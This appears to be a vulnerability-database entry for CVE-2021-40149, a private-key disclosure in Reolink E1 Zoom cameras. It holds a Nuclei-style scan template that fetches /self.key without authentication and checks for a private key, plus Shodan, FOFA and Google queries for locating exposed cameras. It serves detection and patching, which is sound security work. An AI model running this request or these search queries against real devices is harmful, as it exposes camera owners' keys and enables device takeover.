CVE-2021-40149: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure

2025-08-01 Reolink E1 Zoom Camera PoC Public

Description

Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.

PoC

id: CVE-2021-40149

info:
  name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
  author: For3stCo1d
  severity: medium
  description: |
    Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
  impact: |
    An attacker can obtain the private key, potentially leading to unauthorized access and compromise of the camera.
  remediation: |
    Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability.
  reference:
    - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
    - http://packetstormsecurity.com/files/167407/Reolink-E1-Zoom-Camera-3.0.0.716-Private-Key-Disclosure.html
    - https://github.com/MrTuxracer/advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2021-40149
    cwe-id: CWE-552
    epss-score: 0.08298
    epss-percentile: 0.94789
    cpe: cpe:2.3:h:reolink:e1_zoom:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: reolink
    product: e1_zoom
    shodan-query: http.title:"Reolink"
    fofa-query: title="reolink"
    google-query: intitle:"reolink"
  tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/self.key"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '(?m)^-----BEGIN PRIVATE KEY-----'

      - type: word
        part: header
        words:
          - "application/json"
          - "application/html"
        condition: and
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ff5564b5b7f54e7e6e9c3ad3d62432b778651ad06bf926ab3d1dbe64888ce10c022100c62f7543d16e1a2f0cd9ebcd1ee1be8a8458aa9b50321575fadea0fc843297cc:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities